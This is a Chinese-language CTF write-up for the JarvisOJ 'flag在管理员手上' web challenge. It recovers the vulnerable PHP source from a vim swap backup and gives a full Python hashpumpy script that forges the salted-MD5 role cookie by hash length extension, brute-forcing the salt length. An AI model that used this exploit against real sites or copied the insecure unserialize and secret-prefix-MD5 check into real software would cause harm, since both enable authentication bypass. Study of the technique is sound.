jarvisoj flag在管理员手上
涉及知识点:
(2)哈希长度拓展攻击
解析:
进入题目的界面。看到
那么就是想方设法的变成admin了。挂上御剑开始审计。发现cookie有点问题,这个role很明显是guest字符串的序列化。
那么是不是简单的把role换成admin的序列化就可以了?尝试了一下,果然不行。
这时候,御剑扫到东西了。看了一下是个index.php~文件,看了一下内部。。乱码,估计是一个可以复原的文件。
去kali下把后缀改成.swp,使用vim -r指令来复原文件。
得到源码。
<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
body {
background:gray;
text-align:center;
}
</style>
</head>
<body>
<?php
$auth = false;
$role = "guest";
$salt =
if (isset($_COOKIE["role"])) {
$role = unserialize($_COOKIE["role"]);
$hsh = $_COOKIE["hsh"];
if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) { //strrev()函数使字符串倒过来
$auth = true;
} else {
$auth = false;
}
} else {
$s = serialize($role);
setcookie('role',$s);
$hsh = md5($salt.strrev($s));
setcookie('hsh',$hsh);
}
if ($auth) {
echo "<h3>Welcome Admin. Your flag is
} else {
echo "<h3>Only Admin can see the flag!!</h3>";
}
?>
</body>
</html>
本来可以使用hashpump来工具操作,但是这道题没有给salt的长度。。只能爆破了。
附上爆破脚本
import requests,hashpumpy,urllib def attack(): url = 'http://web.jarvisoj.com:32778/' old_cookie = '3a4727d57463f122833d9e732f94e4e0' str1 = 's:5:"guest";' str2 = 's:5:"admin";' str1 = str1[::-1] #倒过来,这道题要role的值反过来求md5 str2 = str2[::-1] for i in range(1,20): #用于爆破salt的长度 new_cookie,message = hashpumpy.hashpump(old_cookie,str1,str2,i) payload = {'role':urllib.parse.quote(message[::-1]),'hsh':new_cookie} #quote()可以把 \x00 变成 %00 ans = requests.get(url,cookies = payload) print(i) print(ans.text) if 'welcome' in ans.text: print(ans.text) #print(urllib.parse.quote('\x00')) attack()
爆破出flag。
PS:哈希长度拓展攻击只能用于salt在可变参数之前的情况下。还有本题的逆序是个特例,常用脚本可以去掉str1 = str1[::-1]等的。